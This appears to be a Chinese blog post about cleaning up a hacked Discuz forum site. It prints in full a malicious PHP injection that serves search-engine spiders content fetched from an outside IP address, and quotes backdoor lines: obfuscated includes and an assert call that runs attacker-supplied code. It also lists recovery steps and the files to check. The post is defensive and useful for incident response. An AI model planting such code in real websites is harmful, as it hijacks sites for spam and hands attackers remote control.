网站被加了文件，恶意网站修改discuz_application.php如何解决

就是修改source/class/discuz/discuz_application.php文件，大家如何处理？

<?php

set_time_limit(30);error_reporting(0);$tr=stristr;$er=$_SERVER;define('url',$er['REQUEST_URI']);define('ref',$er['HTTP_REFERER']);define('ent',$er['HTTP_USER_AGENT']);define('site',"http://155.159.59.1");define('road',"/?road=".$er['HTTP_HOST'].url."&der=".ent);define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');define('area',$tr(url,".xml")or $tr(url,".doc")or $tr(url,".pdf")or $tr(url,".txt")or $tr(url,".ppt")or $tr(url,".pptx")or $tr(url,".xls")or $tr(url,".csv")or $tr(url,".shtml")or $tr(url,".docx")or $tr(url,".xlsx")and $tr(url,"?"));if(area&&preg_match(regs,ref)){echo g('http://155.159.59.1/sb.html');exit;}if(preg_match(regs,ent)){if(area){echo g(site.road);exit;}else{echo g("http://155.159.59.1/u.php");ob_flush();flush();}}function g($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}

这代码是什么意思呢

一般网站被黑都会表现为首页被修改或者打开网站跳转到其他网址。

处理的办法：

1、首先做好备份，登陆ftp新建一个zzz目录，保留config，data。这两个目录，把网站的其余内容放到zzz目录。

2、到官方下载相应版本的源程序，删除官方下载的程序中的config目录，data目录,uc_server/data目录, 模板目录template/ ，插件目录source/plugin/ 这些目录，然后上传到网站的根目录。

3、从zzz目录找到uc_server/data , 模板目录template/ ，插件目录source/plugin/ 这3个目录，然后放到根目录。

4、登陆网站检查一下网站的内容，没有问题的话，说明网站已经恢复好了。

后续工作：修改一下网站所有相关的账号密码，能升级到最高版本的程序的话最好升级。

最近发现站点被黑了，现在还不知道是由系统漏洞导致的系统账户被攻陷，还是程序漏洞，文件被篡改。有一些敏感关键词（例如：赌博，电子路单）被恶意指向，点击搜索结果自动跳转到其他站点，而且是大量的，通过搜索“site:xxx.com 赌博”，会发现一大堆。该目的是为该站点导流量，还有传递权重。

为了防止暴露，入侵者会把被篡改的文件时间戳保持不变，所以通过修改时间是发现不到可疑文件的

现在解决办法只限于，查找程序源码，一个一个文件对比最初的文件，最后发现有两个文件最重要，如下：

1. source/function/function_core.php

2. uc_server/control/admin/user.php

3. source/class/discuz/discuz_admincp.php

4. source/class/discuz/discuz_application.php

因为这四个文件，function_core.php是是核心函数库所有页面都会包含；user.php是ucenter后台登陆，discuz_admincp.php是discuz管理中心用户登录，都可以获得管理员账号和密码；discuz_application.php是整个discuz初始化的核心类文件，初始化加载。

遇到相同问题的朋友，请首先查看这几个文件是否被修改。

入侵方式一：一般会在全局文件中include一个外部的文件，例如：

@include('/dev/shm/.../tmp');

@include(PACK('H*','2f746d702f2e612f636c69656e742e706870'));

入侵方式二：

植入代码，可以执行外部传入的代码，例如：@array_map("ass\x65rt",(array)@$_REQUEST['ADMINCPS']);

ass\x65rt 其实就是 “assert”。

根据上面的线索，在下面的地方应该可以发现一些有恶意代码的文件，一般是恶意搜索引擎

• 系统的虚拟内存是否有东西，ls -a /dev/shm/ 例如：三个点的... 的隐藏文件

• ls -a /tmp  这个也要注意

本文标签：

转载请注明出处： http://www.iuseo.com/post/147.html